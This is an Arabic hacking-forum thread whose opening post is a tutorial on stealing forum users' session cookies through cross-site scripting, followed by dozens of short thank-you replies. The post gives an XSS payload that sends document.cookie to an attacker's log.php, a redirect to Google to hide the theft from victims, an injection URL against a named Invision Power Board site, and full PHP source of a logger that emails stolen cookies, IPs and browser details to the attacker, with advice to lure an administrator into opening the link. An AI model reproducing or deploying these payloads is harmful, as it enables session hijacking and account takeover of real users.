مشاهدة النسخة كاملة : بعد غياب طويل / شرح مبسط : استغلال ثغرات xss + تطبيق
noureno-rca
12-26-2012, 02:10 PM
السلام عليكم ورحمه الله وبركاته ,,
الان هذا اول درس لي بهذا القسمبعد الغياب وهو يتكلم عن كيفيه عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط ثغرات
xss
طيب نأتي الان الى الكود المهم في عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط xss
هذا كود سكربت خبيث يأتي بمعلومات الكوكيز تجده دائما ً في عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقطxss
كود PHP:
**********javascript:alert(document.******)</Script>
الأن الكود هذا لم يكون بالثغره سوف يظهر لك الكوكيز تبعك وهو يحتوي على نقاط مهمه وهي :
1- رقم العضويه
2- الباسورد مشفر md5
3 - الباسورد مشفر Hash
ورقم الاستايل وغيره ,, على حسب نوعيه البرنامج المصاب!
طيب الحين وجدت هذا الكود سوف نربطه باللوج
ماهو اللوج ؟
اللوج هذا تربطه مع السكربت الذي ياتي بالكوكيز ,, وبعد ان تربطه كل من فتح السكربت وهو مربوط باللوج سوف يسجل معلومات الكوكيز تبعه باللوج او يرسل الى ايميلك ( على حسب اللوج )
طيب الان بعد ما ربطته اصبح الرابط :
كود PHP:
**********location.href="http://www.xxxxx.com/log.php?id="+document.******</Script>
تمام الان :
عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط = الموقع المربوط فيه اللوج
log.php = اسم ملف اللوج
طيب الحين نرفع اللوج على اي موقع عندك وبعد كذا تستبدل
عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط برابط اللوج الي عندك
المهم الان هذا السكربت اصبح جاهزا للاستعمال سوف نضعه بكود الثغره ونستبدل :
كود PHP:
**********javascript:alert(document.******)</Script>
بـ
كود PHP:
**********location.href="http://www.xxxxx.com/log.php?id="+document.******</Script>
الان نخلي مثلا المدير العام او اي عضو تبي تسرق الكوكيز تبعه انه يفتح الرابط
بتقول كيف بقولك ياااولد انت وراااااسك(6) عاد بطريقتك خليه يفتح الرابط
طيب الحين بتقولي والله فضيحه يابو خالد لم اخليه يفتح الرابط يطلع عنده اللوج وبيكشفني
بقوله ولا يهمك اخوي نربطه كمان بموقع للتمويه
مثلا نربطه بموقع عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط بحيث انه لم يفتح الثغره والمربوط فيها اللوج وموقع جوجل راح يتحول اوتوماتيك الى جوجل http://www.3asfh.net/vb/images/smilies/0056.gif (http://www.alqobor.com/vb/showthread.php?t=31313) وبكذا مايشك
بتقول كيف يابو خالد بقولك كذا نضع بعد رابط اللوج :
re=www.google.com&
بس http://www.3asfh.net/vb/images/smilies/0056.gif (http://www.alqobor.com/vb/showthread.php?t=31313)
بحيث يكون بعد & يوجد id ... الخ
يعني يكون الكود :
كود PHP:
**********location.href="http://www.xxxxx.com/log.php?re=www.google.com&id="+document.******</Script>
طبعا انت استبدل عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط باي موقع تبغاه ويفضل يكون الموقع الي مصاب فيه الثغره (1)
طيب الحين تقول كذا تمام يابو خالد يالله عطنا مثااال
بعطيكم مثال لثغره الي اكتشفتها انا بمنتديات :Invision Power Board
الكود للثغره :
عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط '>**********alert(document.******)</script>
احنا راح نستبدل :
كود PHP:
**********javascript:alert(document.******)</Script>
بـ
كود PHP:
**********location.href="http://www.xxxxx.com/log.php?re=www.google.com&id="+document.******</Script>
واستبدل هنا موقع جوجل باي موقع تبغاه
ورابط اللوج عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط باللوج تبعك
====================
تطبيق :
التطبيق هنا :
كود PHP:
http://www.mahrum.com/forums/index.php?act=idx='>**********alert(document.******) </script>
===================
اللوج :
كود PHP:
<?php
// Thnx For Security 4 Arab - عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط - عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط
//----- S4a Logger v0.10 -----//
// Star
//Your Email --::--
$ToGet = "
[email protected]";
////////////////////////////////
$Ip = $REMOTE_ADDR;
$Sys = $HTTP_USER_AGENT;
//////////////////////////////////////////////
if($ToGet == ''){echo 'Edit Your Email Befor You Use Me !!'; exit();}
//
$Time = date("l dS of F Y h:i:s A");
$Hdr = 'From: Logger <logger@secourty>';
$Msg = '
Hi ,, Mr.Attacker :D
-------------------------------------------
- Thnx For S4a ,, Security For Arab Forum -
- s4a -
- s4a froum -
---------------------------------------------------------------------
- This Script Coded By Devil-00 [ Devil From Palestine ] -
- <
[email protected]><
[email protected]><devil0f0p@ya hoo.com> -
---------------------------------------------------------------------
- IP ::- [ ' .$Ip.' ]
- System ::- [ '.$Sys.' ]
- The ****** ::- [ '.$id.' ]
- Time ::- [ '.$Time.' ]
---------------------------------------------------------------------
- root@devil00 ~ ./evilcat /etc/passwd -
- root@devil00 ~ ./s4acracker passwd --log <log.log> && -
---------------------------------------------------------------------
';
$send = mail($ToGet,'S4a - [ New****** ]',$Msg,$Hdr);
//
/* &@#&@#&@#&@#&@#&@#&@# code ,, By Devil-00 [ 25/5/2005 ] << v0.10 */
if(isset($_GET["re"])){
$&@#&@#&@#&@#&@#&@#&@# = $_GET["re"];
if($&@#&@#&@#&@#&@#&@#&@# == ""){
mail ($ToGet,'S4a - [Error]','&@#&@#&@#&@#&@#&@#&@# Is Set And Its Empty !!',$Hdr);
}else{
header("location:".$&@#&@#&@#&@#&@#&@#&@#);
}
}
//
?>
استبدل هنا :
كود PHP:
$ToGet = "
[email protected]";
الايميل: عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط
بالايميل تبعك !
واحفظه بامتداد php طبعا افتح المفكره وحط الكود ولاتنسى تغير اع التطبيق الا لانه درس عملي فقط لا أكثر ..
وبإمكانك استغلاله بثغره xss تبع cPanel
وغيرها من عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط xss
aol5100
01-01-2013, 02:44 PM
شرح جميل مشكور
- - - تم التحديث - - -
شرح جميل و بسيط مشكور
elsha3er25
01-01-2013, 03:52 PM
مشكوووووووووووووووور
Hack-SeBix
01-01-2013, 10:51 PM
merciiiiiiiiiiiiiiiiiiiiiii
kaiwa
01-02-2013, 09:22 AM
goooooooooooooooooood
Hacker Rakan
01-02-2013, 11:57 AM
مشكور ويعطيك ألف عافيه
- - - تم التحديث - - -
.. تسلم اناملك على المجهود الرائع ..
لاهنت ويعطيك الف عافيه
jok17
01-02-2013, 12:04 PM
مشكوووووووووووووووور
Cyb3Rm0uJah3D
01-05-2013, 12:21 AM
مشكوووووووووووووووور
mafiaboy
01-07-2013, 09:57 PM
شكرا لك يا أخي على المجهود
flashmen
01-07-2013, 10:30 PM
بارك الله فيك اخي
ندى العنزي
01-07-2013, 10:43 PM
مشكوووووووووووووور
kaader
01-07-2013, 10:58 PM
مشكوووووووووووووووووور
Blackline
01-08-2013, 11:49 PM
رائع اخى الكريمـ
سرمد المهندس
01-08-2013, 11:52 PM
شنو هاي الثغره اخوان احنه نرجع ليوره هاي الثغره قديمه كلش وين الجديد اصلا استحي اتكلم بهيك ثغرات شوفولنه شي جديد
Me$uT.dZ
01-09-2013, 02:21 PM
مشكووووور اخي
Š~ ĐáŅ†Э~ Ŷ
01-09-2013, 02:51 PM
مشكوور بارك الله فيك
Mostafa Mohamed
01-10-2013, 07:35 PM
مشكوووووووووووور
sticky 1008
01-30-2013, 12:17 AM
شكرا لك اخي
selhab
01-30-2013, 01:28 AM
جارى التجربة
- - - تم التحديث - - -
جارى التجربة
mr.010
01-30-2013, 01:27 PM
مشكووور اخوي على الطرح،،:)
- - - تم التحديث - - -
مرة اخرى اشكرك من كل قلبي ...!
- - - تم التحديث - - -
مرة اخرى اشكرك من كل قلبي ...!
safi syrian
01-30-2013, 06:00 PM
مشكووور أخي الله يعطيك العافية
- - - تم التحديث - - -
مشكووور أخي الله يعطيك العافية
møjàhiD
01-30-2013, 06:24 PM
merci beaucoup et dima meghrib
عبدالله97
01-30-2013, 06:28 PM
مشكوووووور بارك الله فيك...........بالتوفيق
zaki009
01-31-2013, 01:53 PM
مشكوور اخي
Demonz
02-01-2013, 06:44 PM
مشكورررررررررر
shhaby
02-02-2013, 01:28 AM
http://www.samysoft.net/forumim/shokr/4/fgsgsdg.gif
noureno-rca
02-02-2013, 09:15 PM
شكرا على الردود الجميلة !
الذئب الاسود العراقي
02-02-2013, 09:40 PM
اوكيييييييييييي ومافتهمت شييييي :biggrin:
ayman2030
02-03-2013, 09:06 PM
جاري التحريب والف شكر
- - - تم التحديث - - -
الروابط لاتظهر رغم الرد
- - - تم التحديث - - -
جزاك الله الف خير والله لم افهم
- - - تم التحديث - - -
جزاك الله الف خير والله لم افهم
- - - تم التحديث - - -
نفس المشكل
- - - تم التحديث - - -
عدم ظهور الروابط
dakidouk5
02-03-2013, 09:35 PM
مشكووور ننتضرر جديدك
ELSARTY SOFT
02-03-2013, 11:50 PM
بارك الله فيك
........
- - - تم التحديث - - -
بارك الله فيك
........
القلب المجهول
02-09-2013, 05:08 PM
مشكوووووووووور
اريد تعلم تهكير ايميلات
02-09-2013, 05:14 PM
شكرا جزيلا لك
Sniper Dhi Qar
03-28-2013, 03:17 PM
شكرا جزيلا
boda_hackr
03-29-2013, 12:43 AM
مشكور اخى بارك الله فيك
عثمان هكر مغربي
03-29-2013, 07:13 AM
بارك الله فيك أخي
mafiaboy
03-29-2013, 01:46 PM
thnaksss khoya
mohssine54
03-29-2013, 01:50 PM
.. تسلم اناملك على المجهود الرائع ..
- - - تم التحديث - - -
.. تسلم اناملك على المجهود الرائع ..
ahmedfreed
03-29-2013, 01:51 PM
بارك الله فيك مشكور عالنقل بس لو مسجل يكون احسن
mohssine54
03-29-2013, 02:18 PM
.. تسلم اناملك على المجهود الرائع ..
- - - تم التحديث - - -
.. تسلم اناملك على المجهود الرائع .. merciiiiiiiiiiiiiiiiiii khoya
Max_07
03-30-2013, 12:27 AM
مشكور اخي بالله، شرح رائع للغاية
- - - تم التحديث - - -
رائع صديقي!
hamidov
03-30-2013, 02:01 AM
gg bosss :DDE
hacker mizo
03-30-2013, 07:08 PM
بارك الله في يا أخي شرح جميل
ربى زدنى
03-30-2013, 11:54 PM
:) مجهود رائع
hackerpk
03-30-2013, 11:57 PM
بارك الله فيك
الهكر عقرب الظلام
03-31-2013, 05:59 PM
بارك الله فيك
zaizo max
04-02-2013, 06:06 PM
مفبش كلام فلة عليك
----------------------------------------------------------
إذا غامرت فى شرف المرومِ ********فلاتقنع بما دون النجومِ
فطعم الموت فى امرٍ حقيرٍ *******كطعم الموت فى امرِ عظيمِ
Guhks
04-02-2013, 06:28 PM
ممتاز اخي عمل رائع
dark prince
04-03-2013, 05:51 PM
مشكور للطرح بارك الله في
تقبل مروري
meh01
04-04-2013, 02:35 PM
شرح مبسط و رائع شكككرا
zaki009
04-06-2013, 10:14 PM
thank youuuuu
hitman007
04-07-2013, 12:48 AM
مشكوووووووووو
- - - تم التحديث - - -
Merciiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii iiiiii
amerok
04-07-2013, 10:53 AM
merciiiiiiiiiiiiiiiiiiiiiiiiiiiiiii
iop hamid
04-07-2013, 03:41 PM
شكرا لك يا أخي على المجهود
nabilfa
04-07-2013, 03:51 PM
chokran khoya
محمد الكبار
04-07-2013, 03:56 PM
لازم انرد باش انشوف الموضوع ^^
- - - تم التحديث - - -
مشكوررررررررر
twister
04-07-2013, 04:07 PM
thxx alot ya kbeeer
superdon
04-07-2013, 05:48 PM
بارك الله فيك اخي
قناص الخير
04-07-2013, 05:56 PM
يعطييك العاافييه
spamer
04-07-2013, 07:14 PM
مشكوووووووووووووووور
- - - تم التحديث - - -
مشكوووووووووووووووور
- - - تم التحديث - - -
مشكوووووووووووووووور
K E V I N
04-07-2013, 07:46 PM
يعطيك العافية وتم تقييمك :)
xXEnigmaXx
04-07-2013, 08:52 PM
شكراااااااااااااااااااااا اااااااااا
Hasan Dhib
04-07-2013, 11:02 PM
merciiii :) ...
razeen
04-08-2013, 12:10 AM
مشكوووووووووور
احمد1991
04-08-2013, 01:03 AM
مشكور على الموضوع الجميل
kaiwa
04-08-2013, 01:27 PM
goooooooooooooooooooooooooooooood
- - - تم التحديث - - -
niceeeeeeeeeeee
hitman2013
04-08-2013, 02:40 PM
الله يجزيك خير اخي
- - - تم التحديث - - -
الله يجزيك خير اخي
al-zahrani 07
04-08-2013, 02:48 PM
- - - تم التحديث - - -
شكرا ويعطيك العافيه تقبل مروري
zola500
04-08-2013, 03:43 PM
كفوووووووووووووووووو
BLAST_HACKERS
04-08-2013, 06:57 PM
رائئع بارك الله فيك اخي
- - - تم التحديث - - -
مببببببببببببببببببدع بارك الله فيك
MrKbrit
04-08-2013, 07:17 PM
يسلموووووووو
h6ck9r2013
04-08-2013, 07:43 PM
بارك الله فيك اخي
hacker zammani
04-08-2013, 07:45 PM
مشكووووووووووووووور
h6ck9r2013
04-08-2013, 07:49 PM
بارك الله فيك اخي مشكور
DoomRocket
04-08-2013, 08:12 PM
شكرا لك جزيل الشكر و بارك الله فيك أرجو أن أرى الروابط :tongue:
mizo black ghost
04-09-2013, 03:32 AM
Thank You Brother
xo omar
04-09-2013, 05:30 AM
بارك الله فيك اخي
- - - تم التحديث - - -
بارك الله فيك اخي
badide
04-09-2013, 03:56 PM
بارك الله فيك اخي
- - - تم التحديث - - -
merciiiiiiiiiiiiiiiiiiiiiii
- - - تم التحديث - - -
merciiiiiiiiiiiiiiiiiiiiiii
MRsoufiane9
04-09-2013, 04:04 PM
merciiiiiiiiiiii
badide
04-09-2013, 04:07 PM
شرح جميل و بسيط مشكور اخييييييييييييييييييييييي ييييييييييييييييييييييييي يييي
- - - تم التحديث - - -
شرح جميل و بسيط مشكور
- - - تم التحديث - - -
شرح جميل و بسيط مشكور
- - - تم التحديث - - -
شرح جميل و بسيط مشكور
- - - تم التحديث - - -
شرح جميل و بسيط مشكور
- - - تم التحديث - - -
شرح جميل و بسيط مشكور
- - - تم التحديث - - -
شرح جميل و بسيط مشكور
vedio
04-09-2013, 07:51 PM
hbdhgbjhldgbjlhbfljhbdjlhfbfjlhbf
- - - تم التحديث - - -
بارك الله فيك اخي
abderrahim-saw
04-09-2013, 09:18 PM
طيييييييييييييييييييييييي ييييييييييييييييييب
- - - تم التحديث - - -
لا تظهر الروابط
trcoolmec
04-10-2013, 03:22 PM
Thank youuuuuuuuuuuuuuuuu
- - - تم التحديث - - -
يا عم لازم رد
الفهد&الاسود
04-10-2013, 11:16 PM
بارك الله فيك اخي
..
مشكوووووووووور اخي عاشت ايدك
yassine877
04-11-2013, 01:01 AM
سلام عليكم اخوان انا عضو جديد فى منتدى سبب تسجيلي اني ابحت عن طريقة فعالة لسترجاع حسابي في هوتمايل احد الكلاب اخترقه واريد استرجاعه .
FAnTICoS HAckER
04-11-2013, 03:29 PM
بارك الله فيك اخي
blackme
04-11-2013, 06:09 PM
مشكووووووور
atanane
04-11-2013, 06:35 PM
بارك الله فيك اخي
pop-key
04-11-2013, 09:27 PM
احسن رد مع احسن تحية كمان
- - - تم التحديث - - -
احسن رد مع احسن تحية كمان
The Blood Bood
04-11-2013, 10:19 PM
بارك الله فيك أخي كم احتجت لهدا الموضوع,,,
amina dahbi
04-11-2013, 11:25 PM
merci khoya
mrshell
04-12-2013, 02:28 AM
بارك الله فيك اخي
- - - تم التحديث - - -
بارك الله فيك اخي
fabio1231
04-12-2013, 04:24 AM
good work machkourrr
moussab28
04-12-2013, 12:56 PM
شكرا كتير اخي موضوع روعة
The Blood Bood
04-13-2013, 04:21 AM
بارك الله فيك اخي
Peatrex
04-13-2013, 05:15 AM
بارك الله فيك اخي
- - - تم التحديث - - -
بارك الله فيك اخي
- - - تم التحديث - - -
Mercii Beaucoup !! Thanks c'est vraiment très utile
xX-YASOO-Xx
04-13-2013, 12:17 PM
مشكوووووووووور
- - - تم التحديث - - -
مشكووووووووووووووووور
صقر سيناء
04-13-2013, 01:40 PM
مشكوووووووووووووووووووووو ر
AĦmêd Mastêr،
04-13-2013, 01:58 PM
شكرا على الافادة
- - - تم التحديث - - -
شكراا على الافادة
- - - تم التحديث - - -
مشكووووووووووووووووووووور
LassYaF
04-13-2013, 03:26 PM
mercii :D
salim05
04-13-2013, 03:52 PM
بارك لله فيك
- - - تم التحديث - - -
شكرا على الافادة لله يجازيك
CobRA-MiX
04-13-2013, 09:52 PM
شكرا لك يا أخي على المجهود
mc mouad
04-14-2013, 06:47 PM
machkoooooor
The hakers
04-16-2013, 02:53 PM
مشكوووووووووووووووووووووو ووووووووووووووووووووووووو ووووووووووووووووووووووووو ووووووووووووووووووووووووو ووووووووووووووور
HOLSTEN
04-20-2013, 05:48 PM
مشكوووووووووووووووووووووو وووووووووووووررررررر
almtheer10
04-20-2013, 07:39 PM
رد عشان انشوف الموضوع
لنا عوده لرد ...
- - - تم التحديث - - -
:mad:شكرا بالرد المطور
kalemaro
04-26-2013, 11:23 AM
niiiiiiiice topic
lolokid
04-26-2013, 07:20 PM
يسلمووووووووووووووووووووو وووووووووو ع الموضوع
belo007
04-27-2013, 03:48 AM
thanks my bro your new post, i wish i learn from it, again thanks for you
zaki009
04-28-2013, 12:25 PM
thank you broth
hack 2013
04-30-2013, 09:24 PM
شكرا لك يا أخي على المجهود الرائع
mohammed belhacini
05-01-2013, 02:46 AM
merciiiiiiiiiiiiiiiiiiiiiii
mohammed belhacini
05-04-2013, 03:21 AM
مشكوووووووووووووووورhttp://img819.imageshack.us/img819/306/youarehackedj.jpg
mostafa40
05-04-2013, 12:48 PM
مشكوووووووووووووووور
mer.vip
05-04-2013, 01:51 PM
http://im38.gulfup.com/ms62W.gif
- - - تم التحديث - - -
http://im38.gulfup.com/ms62W.gif
- - - تم التحديث - - -
http://im38.gulfup.com/ms62W.gif
mehdi pol
05-04-2013, 07:18 PM
gooooood
thnnnnxxxxxx
- - - تم التحديث - - -
gooood :biggrin:
fouzishockvalue
05-06-2013, 06:17 PM
Good !!!!!!!!!!!!!!!!!!!
sohayl111
05-09-2013, 01:24 AM
بارك الله فيك
عبدالله العاني
05-09-2013, 07:52 AM
شكررررررررررررررررررر اخي
- - - تم التحديث - - -
مشكووووووووور
lost dream
05-09-2013, 02:02 PM
شكرا لك على مجهودك الرائع لك مني كل التقدير
hani xavi
05-12-2013, 11:09 PM
مبدع ما قصرت
rami mcee
05-13-2013, 02:39 AM
بارك الله فيك اخي
KouchmarDz
05-13-2013, 10:48 AM
يعطيـــــــكـ ألف عافية
yeussf
05-13-2013, 12:19 PM
تسلم.......
iplayworld888
05-15-2013, 09:58 PM
مشكوووور وما قصصرت عزيز و غالي
FreSe You
05-22-2013, 12:19 PM
مشكووووور اخي
simo10
05-22-2013, 03:45 PM
thnksssssssssssss
- - - تم التحديث - - -
مشكووووووووووووووووور
Ahmed_14
05-23-2013, 12:32 AM
ألف شكر لك
farra
05-23-2013, 03:50 AM
مشكور كتييير
cj.z4k1
05-25-2013, 11:18 PM
mérciiiiiiiiiiiiiiiiiiiiiiiiii ;)
- - - تم التحديث - - -
مشكوووووووووووووووور
عمرخيرالسيد
06-02-2013, 01:00 PM
مرسييييييييي على المجهوووووووووود:):wink::cool::big grin::(:eek::mad:;)
عاشق الها
06-02-2013, 02:19 PM
يعطيك الف عافيه
- - - تم التحديث - - -
شكرا ويعطيك الغافيه
adem199
06-03-2013, 02:42 PM
موضوع متعوب عيه شكرا أخي
الهاكر الاماراتي
06-03-2013, 03:42 PM
مشكور علي الموضوع
haker.abode
06-03-2013, 08:02 PM
شرح أكثر من رائع
بارك الله فيك .... مشكوور
واصل....
FBI HACKER
06-03-2013, 09:09 PM
بارك الله فيك اخي
- - - تم التحديث - - -
بارك الله فيك اخي
- - - تم التحديث - - -
بارك الله فيك اخي
عبدالله العاني
06-03-2013, 11:13 PM
مشكورررررررررررر
- - - تم التحديث - - -
مشكوررررررررررر
fouelctro
06-09-2013, 08:56 PM
عودة محمودة
jasem1
06-09-2013, 09:31 PM
شكراااااااااااااااااااااا ا
- - - تم التحديث - - -
شكراااااااااااااااااااااا ااااااااااااااااااااااااا اااااااااااااااااااااااا
13ammar
06-12-2013, 01:35 AM
مشكور على هذا الجهد
مشكوووور حبيبى و واصل تقدمك
- - - تم التحديث - - -
:) مشطووور بجد
السهيل اليماني
06-16-2013, 10:26 AM
تسلم ياغالي وربي يعطيك العافيه يارب معلومات في قمة الروغه
- - - تم التحديث - - -
اخي الغالي درسك في غاية الاهميه ومهم جدا بارك الله فيك وجزاك الله كل خير
قهر اليهود
06-16-2013, 06:02 PM
مشكوور أخي وبارك الله فيك
hithemlion
06-21-2013, 02:07 PM
مشكور جدا لك وعلى مجهودك الجميل
hacker mizo
06-22-2013, 06:44 PM
مشكووور ياا إخي موضوع جميل
كرار الدنيناوي
06-24-2013, 11:17 PM
مشكوووووووووووووووووووووو ر
- - - تم التحديث - - -
شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً 